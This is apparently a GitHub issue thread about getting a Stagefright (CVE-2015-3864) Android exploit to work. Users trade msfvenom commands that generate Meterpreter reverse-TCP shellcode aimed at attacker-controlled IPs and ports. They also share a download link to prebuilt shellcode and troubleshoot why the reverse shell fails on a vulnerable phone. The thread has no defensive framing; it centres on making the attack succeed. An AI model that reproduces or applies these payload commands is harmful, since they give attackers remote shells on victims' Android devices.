Shellcode

[umerov1999]

How to make a shellcode for this exploit. You shellcode.bin is the apk file, is that correct? You tested this exploit?(Как сделать шелл-код для эксплоита. У вас shellcode.bin является apk файлом. Это правильно и вы тестировали этот эксплоит?)

[eudemonics]

i generated it with msfvenom actually but haven't been able to get it working successfully, so i suggest using your own shellcode. the included shellcode is supposed to be a reverse tcp shell for android arm architecture.

[umerov1999]

I generated shellcode.bin with msfvenom(msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.21 lport=1996 R > shellcode.bin) and created exploit.mp4, but this exploit doesn't work in my device(Samsung Galaxy Note 8, armv7-a , Android 4.4.4 official) my device is vulnerable to cve-2015-3864(tested in Zimperium Stagefright Detector).

[sgang007]

@eudemonics Can you give any working shellcode or tell how to generate one to test the code.

[umerov1999]

https://github.com/eudemonics/scaredycat/files/85152/shellcode.bin.zip

[umerov1999]

This shellcode armle/linux/reverse_tcp

[dadreamer]

@umerov1999
Thx for this hint, I was trying to build a shellcode for android, not for linux. So, it should look something like this:

msf > msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
[*] exec: msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 200 bytes

Did you get the reverse shell successfully with the code, you've posted above? I don't with mine and I'm unsure how to test it.